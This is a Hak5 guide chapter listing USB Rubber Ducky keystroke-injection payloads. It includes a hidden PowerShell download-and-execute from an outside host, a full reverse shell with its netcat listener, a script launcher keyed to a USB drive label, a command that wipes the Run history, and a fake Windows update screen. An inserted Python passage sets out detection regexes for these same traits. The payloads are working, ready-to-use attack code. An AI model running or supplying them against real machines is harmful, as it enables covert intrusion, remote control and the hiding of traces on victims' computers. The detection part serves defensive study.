Sample Payloads
Hundreds if not thousands of payloads exist for the USB Rubber Ducky. Typically they are shared on the USB Rubber Ducky forums or wiki.
In this final chapter of the getting started guide we'll list a few extremely short yet powerful payloads to help you get started.
Download and Run an Executable
DELAY 3000
GUI r
DELAY 200
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://darren.kitchen/calc.txt',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER
PowerShell Reverse Shell
DELAY 3000
GUI r
DELAY 100
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/p.ps1');"
ENTER
Host the following as p.ps1 on your web server for a reverse shell. Just be sure to configure the IP address and port of your netcat listener.
$sm=(New-Object Net.Sockets.TCPClient("hostofnetcatlistener", 4444)).GetStream(); [byte[]]$bt=0..65535|%{0}; while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i); $st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $sm.Write($st,0,$st.Length)}
Finally, on the listening host use netcat to receive the shell with:
nc -l -p 4444
Run a Script from a USB Drive
DELAY 3000
GUI r
DELAY 100
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\p.ps1"
ENTER
The above payload looks for a USB drive with the label "DK" and executes the PowerShell file "p.ps1" from the root of the drive.
Clear the Run Dialog History
DELAY 3000
GUI r
DELAY 100
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
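A defender's view of the PowerShell payloads above, as an added example that is not part of the original guide: a Python triage over process-creation records that flags the traits those payloads share. The record field names (`parent`, `image`, `cmdline`), the trait names and the two-trait threshold are assumptions; the flagged command lines are the payloads from this page.

```python
import re

# Traits shared by the Run-dialog PowerShell payloads on this page. PowerShell
# accepts abbreviated, case-insensitive parameter names, so the patterns match
# -W / -WindowStyle and -Exec / -ExecutionPolicy / -ep alike.
TRAITS = {
    "hidden_window": re.compile(r"(?<!\S)-w\w*\s+['\"]?hidden", re.I),
    "policy_bypass": re.compile(r"(?<!\S)-e[xp]\w*\s+['\"]?bypass", re.I),
    "download_cradle": re.compile(r"\.download(string|file)\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "volume_label_lookup": re.compile(r"win32_volume.*\.label", re.I | re.S),
    "runmru_clear": re.compile(r"remove-itemproperty.*\\runmru", re.I | re.S),
}
SHELLS = {"powershell.exe", "pwsh.exe"}

def traits(cmdline):
    """Return the names of all traits present in one command line."""
    return [name for name, rx in TRAITS.items() if rx.search(cmdline)]

def triage(events):
    """Return (event, traits, from_explorer) for PowerShell launches with two
    or more traits, or with any attempt to wipe the Run dialog history."""
    hits = []
    for ev in events:
        if ev["image"].lower() not in SHELLS:
            continue
        found = traits(ev["cmdline"])
        if len(found) >= 2 or "runmru_clear" in found:
            # A process started from the Run dialog has explorer.exe as parent.
            hits.append((ev, found, ev["parent"].lower() == "explorer.exe"))
    return hits

# Constructed records (field names are assumptions). The first three command
# lines are payloads from this page; the last two are benign controls.
EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline":
     r'''powershell "IEX (New-Object Net.WebClient).DownloadString('https://mywebserver/p.ps1');"'''},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline":
     r'''powershell -NoP -NonI -W Hidden -Exec Bypass "$uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\p.ps1"'''},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline":
     r'''powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"'''},
    {"parent": "svchost.exe", "image": "powershell.exe", "cmdline":
     r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for ev, found, from_run in triage(EVENTS):
        print(found, "parent=explorer.exe" if from_run else "", ev["cmdline"][:60])
```

The scheduled-task style control carries a single trait and stays below the threshold, which is the trade-off the two-trait rule is meant to show.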
Full Screen Windows 10 Update
DELAY 3000
GUI r
DELAY 100
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 3000
F11
For continued reading, you are encouraged to join the Hak5 community – a vibrant community of creative developers, enthusiasts and penetration testers. Welcome!